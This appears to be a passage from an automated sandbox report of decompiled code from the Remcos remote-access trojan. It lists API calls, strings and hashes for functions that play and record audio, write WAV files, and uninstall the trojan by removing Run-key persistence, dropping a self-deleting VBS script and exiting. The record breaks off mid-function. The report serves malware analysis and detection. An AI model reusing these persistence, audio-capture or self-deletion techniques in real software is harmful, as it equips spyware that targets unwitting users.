				if(E004165B1( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = L00401ECB( &_a4);
					_t103 = 0x30;
					L00401EDA( &_a4, 0x30, _t111, E004179B3( &_v28, 0x30, _t63));
					L00401ED0();
				}
				_t25 = E00402469();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(L00401ECB( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00402064(_t67, _t114 - 0x18, 0x45f6ac);
						_push(0xa8);
						E00404A6E(_t67, 0x46ca00, _t103, __eflags);
					}
				} else {
					_t60 = L00401ECB( &_a4);
					_t118 = _t114 - 0x18;
					E004020CC(_t67, _t118, _t103, _t120, _t109);
					E004173A6(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = L00416C32( &_v124, _t67);
					_t108 = E00403010( &_v28, E00403086(_t67,  &_v76, L00409E6B( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					E00403086(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					L00401ED0();
					L00401ED0();
					L00401ED0();
					L00401ED0();
					mciSendStringW(L00401ECB( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E00402064(0, _t114 - 0x18, 0x45f6ac);
					_push(0xa9);
					E00404A6E(0, 0x46ca00, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x46bea8 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x46bea6; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x46bea6 = 0;
							}
							__eflags =  *0x46bea5; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x46bea5 = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x46bea8);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x46bea8; // 0x0
							} else {
								CloseHandle( *0x46bea8);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00402064(0, _t115 - 0x18, 0x45f6ac);
						_push(0xaa);
						E00404A6E(0, 0x46ca00, _t108, _t122);
						L00401ED0();
						goto L21;
					}
				}
				L21:
				return L00401ED0();
			}

0x0041636b
0x00416375
0x00416377
0x00416385
0x0041638a
0x00416390
0x0041639f
0x004163a7
0x004163a7
0x004163ae
0x004163b6
0x004163b8
0x004164a5
0x004164a7
0x00000000
0x004164ad
0x004164b7
0x004164bc
0x004164c6
0x004164c6
0x004163be
0x004163be
0x004163c3
0x004163cb
0x004163d2
0x004163d7
0x004163da
0x004163e4
0x00416417
0x0041641c
0x00416425
0x0041642d
0x00416435
0x0041643d
0x00416450
0x00416464
0x00416466
0x00416470
0x00416475
0x0041647f
0x00416489
0x0041648f
0x0041648f
0x0041648f
0x00416560
0x00416560
0x00416562
0x00000000
0x00000000
0x004164d0
0x004164d6
0x004164e0
0x004164e2
0x004164e2
0x004164e8
0x004164ee
0x004164f8
0x004164fa
0x004164fa
0x0041650c
0x0041650e
0x00416511
0x00416516
0x00416518
0x0041651c
0x0041651f
0x00000000
0x00000000
0x00416521
0x00416522
0x00416525
0x00000000
0x00416527
0x0041652d
0x0041652d
0x00000000
0x00416525
0x00416544
0x00416546
0x0041655b
0x00416548
0x0041654e
0x00416554
0x00000000
0x00416554
0x00416546
0x00416570
0x0041657a
0x00416586
0x0041658b
0x00416595
0x0041659d
0x00000000
0x0041659d
0x0041648f
0x004165a2
0x004165b0

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416450
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416464
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,Function_0005F6AC), ref: 00416489
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000), ref: 0041649F
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 004164E0
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 004164F8
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041650C
SetEvent.KERNEL32 ref: 0041652D
WaitForSingleObject.KERNEL32(000001F4), ref: 0041653E
CloseHandle.KERNEL32 ref: 0041654E
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416570
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041657A

Strings

play audio, xrefs: 0041645F
open ", xrefs: 004163ED
resume audio, xrefs: 004164F3
status audio mode, xrefs: 00416507
" type , xrefs: 004163F2
close audio, xrefs: 00416575
stop audio, xrefs: 0041656B
pause audio, xrefs: 004164DB
stopped, xrefs: 00416511
alias audio, xrefs: 004163DA

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-1354618412
Opcode ID: e278943c169eb51b2b711e91211faf8a4fc4485685d4d5a064f11794de32eb44
Instruction ID: c8fb6d8f14581896d3eba004d9fbc9f1a09e24d5ac4ccc55cdd35aae18883956
Opcode Fuzzy Hash: e278943c169eb51b2b711e91211faf8a4fc4485685d4d5a064f11794de32eb44
Instruction Fuzzy Hash: 4C51B4716002087AD714BB75DC96DFF3A6DDA50389F14003FF501A61E2EE788E8586AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040B107, Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 259
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040B107() {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				short _v668;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t82;
				void* _t84;
				void* _t85;
				signed char _t123;
				signed char _t124;
				short* _t125;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t231;

				L0040FB4B();
				if( *0x46a9d4 != 0x30) {
					L00409D75();
				}
				_t227 =  *0x46bd6b - 1; // 0x0
				if(_t227 == 0) {
					L00414D1D(_t227);
				}
				if( *0x46ba75 != 0) {
					E004170AC(L00401ECB(0x46c0e0));
				}
				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t229 =  *0x46bb06 - 1; // 0x1
				if(_t229 == 0) {
					E0041074C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401ECB(0x46c4e8));
				}
				_t230 =  *0x46baff - 1; // 0x0
				if(_t230 == 0) {
					E0041074C(0x80000002, _t214, L00401ECB(0x46c4e8));
				}
				_t231 =  *0x46bb04 - 1; // 0x0
				if(_t231 == 0) {
					E0041074C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401ECB(0x46c4e8));
				}
				E00431810(0,  &_v668, 0, 0x208);
				_t49 = E00402469();
				_t50 = L00401F75(0x46c560);
				_t53 = E00410420(L00401F75(0x46c518), "exepath",  &_v668, 0x208, _t50, _t49);
				_t232 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v668, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F75(0x46c518));
				_t56 = E004074E6(_t232);
				_t233 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(L00401ECB(0x46c530), 0x80);
				}
				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
				asm("sbb bl, bl");
				E00403086(_t123,  &_v148, L00416C32( &_v76, E004169EB( &_v28)), 0, _t233, L".vbs");
				L00401ED0();
				L00401FA7();
				E00404409(_t123,  &_v124, E00403086(_t123,  &_v28, E0040425F(_t123,  &_v76, E0043918F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
				L00401ED0();
				L00401ED0();
				E004043E5(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0040425F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401ED0();
				_t124 = _t123 & 0x00000001;
				_t234 = _t124;
				if(_t124 != 0) {
					E004032F1(E00403086(_t124,  &_v28, E004043E5(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0040425F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
					L00401ED0();
					L00401ED0();
					L00401ED0();
				}
				E004032F1(E00403086(_t124,  &_v100, E00403086(_t124,  &_v28, E0040425F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				_t235 = _t124;
				if(_t124 != 0) {
					E0040766E(_t124,  &_v52, 0, L"wend\n");
				}
				_t125 =  &E0045F714;
				_t82 = E004074E6(_t235);
				_t236 = _t82;
				if(_t82 != 0) {
					E004032F1(E00403086(_t125,  &_v100, L00409E6B( &_v28, L"fso.DeleteFolder \"", _t236, 0x46c530), 0, _t236, L"\"\n"));
					L00401ED0();
					L00401ED0();
				}
				E0040766E(_t125,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = L00401ECB( &_v124);
				_t85 = E00402469();
				if(E0041729F(L00401ECB( &_v52), _t85 + _t85, _t84, 0) != 0) {
					ShellExecuteW(0, L"open", L00401ECB( &_v124), _t125, _t125, 0);
				}
				ExitProcess(0);
			}

0x0040b113
0x0040b11f
0x0040b121
0x0040b121
0x0040b129
0x0040b12f
0x0040b131
0x0040b131
0x0040b13d
0x0040b14b
0x0040b14b
0x0040b155
0x0040b15a
0x0040b160
0x0040b171
0x0040b176
0x0040b177
0x0040b17d
0x0040b18e
0x0040b193
0x0040b194
0x0040b19a
0x0040b1ae
0x0040b1b3
0x0040b1c4
0x0040b1d3
0x0040b1db
0x0040b1fc
0x0040b204
0x0040b206
0x0040b211
0x0040b211
0x0040b224
0x0040b236
0x0040b241
0x0040b243
0x0040b252
0x0040b252
0x0040b267
0x0040b26e
0x0040b287
0x0040b290
0x0040b298
0x0040b2cd
0x0040b2d6
0x0040b2de
0x0040b2f9
0x0040b302
0x0040b307
0x0040b307
0x0040b30a
0x0040b33e
0x0040b346
0x0040b34e
0x0040b356
0x0040b356
0x0040b38e
0x0040b396
0x0040b39e
0x0040b3a6
0x0040b3ab
0x0040b3ad
0x0040b3b7
0x0040b3b7
0x0040b3bc
0x0040b3ca
0x0040b3cf
0x0040b3d1
0x0040b3f6
0x0040b3fe
0x0040b406
0x0040b406
0x0040b413
0x0040b41c
0x0040b425
0x0040b443
0x0040b457
0x0040b457
0x0040b45e

APIs

Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,0046C500,0040D57C), ref: 0040FB5B
Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF), ref: 0040FB6E

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,0046C518,0046C500), ref: 0040B211
RegDeleteKeyA.ADVAPI32 ref: 0040B224
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040B252
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040B260

Part of subcall function 00409D75: TerminateThread.KERNEL32(0040884D,00000000,0046C500,0040B126,?,0046C518,0046C500), ref: 00409D84
Part of subcall function 00409D75: UnhookWindowsHookEx.USER32 ref: 00409D94
Part of subcall function 00409D75: TerminateThread.KERNEL32(00408832,00000000,?,0046C518,0046C500), ref: 00409DA6

ShellExecuteW.SHELL32(00000000,open,00000000,0045F714,0045F714,00000000), ref: 0040B457
ExitProcess.KERNEL32 ref: 0040B45E

Strings

"), xrefs: 0040B30C
fso.DeleteFolder ", xrefs: 0040B3D9
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040B1A4
fso.DeleteFile ", xrefs: 0040B367
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B40B
while fso.FileExists(", xrefs: 0040B321
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040B2E3
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040B155
On Error Resume Next, xrefs: 0040B2F1
Remcos, xrefs: 0040B150
exepath, xrefs: 0040B1EE
.vbs, xrefs: 0040B269
open, xrefs: 0040B451
wend, xrefs: 0040B3AF
Temp, xrefs: 0040B2A9

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 3659626935-3677834288
Opcode ID: b7810b8a17b527295b35a461900a90293a47286dc25d50644d104ab7bde1a9f7
Instruction ID: 1fdbb4419d14362d38d1ed4744bf8d6dc0aba1f6708a8cbb9b41b7a1a16d8b70
Opcode Fuzzy Hash: b7810b8a17b527295b35a461900a90293a47286dc25d50644d104ab7bde1a9f7
Instruction Fuzzy Hash: 86819D31A101086ACB14F7A2DCA69EF77699F50748F14003FF506772E2EE785E8A869D

Uniqueness

Uniqueness Score: -1.00%

Function 00401A44, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 155
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401A44(WCHAR* __ecx, signed int __edx) {
				long _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				void _v32;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x46ba9a & 0x0000ffff;
				_t83 = ( *0x46baa6 & 0x0000ffff) * _t80;
				_v20 = 1;
				_v16 = 0x10;
				_v24 = _t83 *  *0x46ba9c >> 3;
				asm("cdq");
				_v28 = _t83 + (__edx & 0x00000007) >> 3;
				_t36 =  *(__edx + 4) * _t80;
				_v32 = _t36;
				_v12 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
					WriteFile(_t81, 0x46ba9a, 2,  &_v8, 0);
					WriteFile(_t81, 0x46ba9c, 4,  &_v8, 0);
					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
					WriteFile(_t81, 0x46baa6, 2,  &_v8, 0);
					WriteFile(_t81, "data", 4,  &_v8, 0);
					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}

0x00401a53
0x00401a56
0x00401a5d
0x00401a60
0x00401a67
0x00401a7a
0x00401a7f
0x00401a90
0x00401a98
0x00401aa3
0x00401aa9
0x00401ab2
0x00401ab7
0x00401ad3
0x00401ae2
0x00401af2
0x00401b02
0x00401b11
0x00401b20
0x00401b30
0x00401b40
0x00401b4f
0x00401b5e
0x00401b6e
0x00401b7e
0x00401b8d
0x00401b9b
0x00401b9e
0x00000000
0x00401ba4
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AAC
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AD3
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AE2
WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AF2
WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B02
WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B11
WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B20
WriteFile.KERNEL32(00000000,0046BA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B30
WriteFile.KERNEL32(00000000,0046BA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B40
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B4F
WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B5E
WriteFile.KERNEL32(00000000,0046BAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B6E
WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B7E
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B8D

Strings

fmt , xrefs: 00401AFC
data, xrefs: 00401B78
RIFF, xrefs: 00401ACD
WAVE, xrefs: 00401AEC

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 422b5d87e93fc4075c6ec35830616d194da27f1ddb5db7f37ea2b3f51acf71b2
Instruction ID: b5e00df74bb3e46237e128d7157f8ec2d4ab39d7b9d0c44a05e459c2c922e607
Opcode Fuzzy Hash: 422b5d87e93fc4075c6ec35830616d194da27f1ddb5db7f37ea2b3f51acf71b2
Instruction Fuzzy Hash: B8413EB5A50218BAE710DA91CC86FFF7BBCDB45B50F500066F704EA0C0D7B45A05DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0044625D, Relevance: 27.4, APIs: 18, Instructions: 419
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0044625D(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = E00434870(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(L00439E14())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x46b4d0; // 0x30e9c60
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x46b4dc; // 0x30e9c60
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x46b4d0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = E00446905(_t298);
												L0043EE85(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										L0043EE85( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = E00446905(_t298);
											L0043EE85(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x46b4d0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = L0043DFD9(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												L0043EE85(_t300);
												goto L12;
											} else {
												_t131 = E004405A6(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E0043629A();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = E00450867(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(L00439E14())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x46b4d4; // 0x30fe808
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x46b4d8; // 0x30e9e70
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x46b4d4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = E00446898(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = E00446905(_t302);
																					L0043EE85(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			L0043EE85( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = E00446905(_t302);
																				L0043EE85(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x46b4d4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = L0043DFD9(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					L0043EE85(_t304);
																					goto L56;
																				} else {
																					_t148 = E00440264(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E0043629A();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t305 = L0043DFD9(_t260, _t93, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E0043E5DA(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									L0043EE85(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
